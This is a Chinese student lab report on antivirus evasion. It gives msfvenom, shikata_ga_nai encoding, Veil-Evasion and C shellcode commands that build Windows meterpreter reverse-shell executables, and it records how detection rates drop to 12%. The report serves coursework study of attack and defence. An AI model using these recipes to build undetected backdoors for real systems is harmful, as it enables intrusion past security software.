20145322《网络对抗技术》免杀原理与实践

20145322《网络对抗技术》免杀原理与实践

基础问题回答

（1）杀软是如何检测出恶意代码的？

基于特征码的检测

再就是根据该代码是否有恶意行为来判别，若有恶意的行为，我们就认为该代码是恶意代码。

（2）免杀是做什么？

通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。

（3）免杀的基本方法有哪些？

改变特征码

对恶意代码进行加壳，或用其他语言（如veil-evasion）或编译器进行再编译，利用shellcode进行编码。

实践总结与体会

通过这次实验，我掌握了非常简单的避免查杀的方法，虽然这只是基本的攻击手段，但也让我发现我的QQ管家也不是完全靠得住的。要想避免被攻击，还是得先了解如何生成攻击。

离实战还缺些什么技术或步骤？

例如在实战中如何在靶机上注入后门程序并运行等，因为本次实验室靶机主动接受我们发送的后门，所以应该再学习如何主动把后门注入到靶机里的技术。

四、实践过程记录

msfvenom直接生成meterpreter可执行文件

已知 Windows IP为：192.168.1.112 kali IP为：192.168.1.118

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 PORT=5322 -f exe > test.exe命令生成meterpreter可执行文件test.exe

使用ncat将文件传输到windows主机之后，上http://www.virscan.org/这个网站检测一下有多少查毒软件可以将其查杀出来

扫描结果:53%的杀软(21/39)报告发现病毒

Msfvenom使用编码器生成meterpreter可执行文件

使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.1.106 PORT=5322 -f exe > test1.exe命令生成编码过的可执行文件test1.exe，编码一次

使用ncat将文件传输到windows主机后，再检测：

扫描结果:56%的杀软(22/39)报告发现病毒

编码十次

使用ncat将文件传输到windows主机后检测：

扫描结果:56%的杀软(22/39)报告发现病毒

由此可得对于编码这种免杀方法一般的杀毒软件都是可以防住的。

使用Veil-Evasion生成可执行文件

在Kali中打开veil-evasion：直接在输入veil-evasion

然后在menu里面输入以下命令来生成可执行文件：

use python/meterpreter/rev_tcp

set LHOST 192.168.1.118

generate

5322test

1

检测如下：

扫描结果:25%的杀软(10/39)报告发现病毒，有些杀软已经开始靠不住了。

使用C语言调用Shellcode

使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.118 LPORT=5322 -f c命令生成一个C语言shellcode数组

利用这个数组在Windows主机的vs平台下写shellcode

在Kali下使用msf监听，运行刚刚编译生成的可执行文件，成功获取权限。

用我的QQ管家查杀：

很好·····杀不出来····

去网站试试

扫描结果:12%的杀软(5/39)报告发现病毒。更少了···反正QQ管家是靠不住了···